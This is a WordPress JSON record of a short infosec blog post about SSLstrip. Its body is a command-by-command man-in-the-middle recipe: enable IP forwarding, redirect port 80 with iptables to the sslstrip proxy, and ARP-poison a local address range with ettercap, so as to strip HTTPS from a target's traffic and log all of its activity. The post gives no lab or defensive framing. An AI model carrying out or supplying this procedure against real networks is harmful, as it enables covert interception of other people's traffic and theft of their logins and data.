{"id":3118,"date":"2021-05-03T12:22:55","date_gmt":"2021-05-03T10:22:55","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=3118"},"modified":"2023-12-24T12:45:38","modified_gmt":"2023-12-24T11:45:38","slug":"sslstrip","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=3118","title":{"rendered":"SSLstrip"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/moxie0\/sslstrip\">SSLstrip<\/a> works as proxy which replaces <span class=\"caps\">HTTPS<\/span> ref\u00ader\u00adences in <span class=\"caps\">HTTP<\/span>, <span class=\"caps\">HTML<\/span>, <span class=\"caps\">JS<\/span>,.\u2026 respons\u00ades with <span class=\"caps\">HTTP<\/span> versions.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Instal\u00adla\u00adtion: SSLstrip is old. Cre\u00adate a venv and install an old\u00ader ver\u00adsion of twist\u00aded: <code>venv\/bin\/pip install Twisted==18.9.0<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Remove <span class=\"caps\">HTTPS<\/span> references via&nbsp;MitM<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Sce\u00adnario:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>You want that $tar\u00adget routes all <span class=\"caps\">HTTP<\/span> traf\u00adfic through your own system.<\/li><li>Your sys\u00adtem should remove each HTTPs reference.<\/li><li>You want to log all activ\u00adi\u00adty from $tar\u00adget.<\/li><\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Per\u00adform the fol\u00adlow\u00ading steps on your attack\u00ading system:<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>Acti\u00advate <span class=\"caps\">IP<\/span> for\u00adward\u00ading:<br><code># echo \"1\" &gt; \/proc\/sys\/net\/ipv4\/ip_forward<\/code><\/li><li>Redi\u00adrect all incom\u00ading traf\u00adfic to port 80 to the SSLstripe proxy at 8080:<br><code># iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080<\/code><\/li><li>Start SSLStrip:<br><code>root@imac2019-kali:\/opt\/sslstrip# venv\/bin\/python2.7 sslstrip.py -l 8080<\/code><\/li><li>Start Etter\u00adcap and poi\u00adson the tar\u00adget in the local net\u00adwork:<br><code># ettercap -TqM arp:remote \/192.168.178.60-70\/\/ \/192.168.178.60-70\/\/<\/code><\/li><\/ol>\n","protected":false},"excerpt":{"rendered":"<p>SSLstrip works as proxy which replaces <span class=\"caps\">HTTPS<\/span> ref\u00ader\u00adences in <span class=\"caps\">HTTP<\/span>, <span class=\"caps\">HTML<\/span>, <span class=\"caps\">JS<\/span>,.\u2026 respons\u00ades with <span class=\"caps\">HTTP<\/span> ver\u00adsions. Instal\u00adla\u00adtion: SSLstrip is old. Cre\u00adate a venv and install an old\u00ader ver\u00adsion of twist\u00aded: venv\/bin\/pip install Twisted==18.9.0 Remove <span class=\"caps\">HTTPS<\/span> ref\u00ader\u00adences via&nbsp;MitM Sce\u00adnario: You want that $tar\u00adget routes all <span class=\"caps\">HTTP<\/span> traf\u00adfic through your own sys\u00adtem. Your sys\u00adtem should remove each&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[468],"tags":[390,17,93,389,8,394,395],"class_list":["post-3118","post","type-post","status-publish","format-standard","hentry","category-general","tag-arp","tag-ettercap","tag-iptables","tag-mitm","tag-ssl","tag-sslstrip","tag-tls"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/3118","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3118"}],"version-history":[{"count":3,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/3118\/revisions"}],"predecessor-version":[{"id":3125,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/3118\/revisions\/3125"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3118"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3118"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3118"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}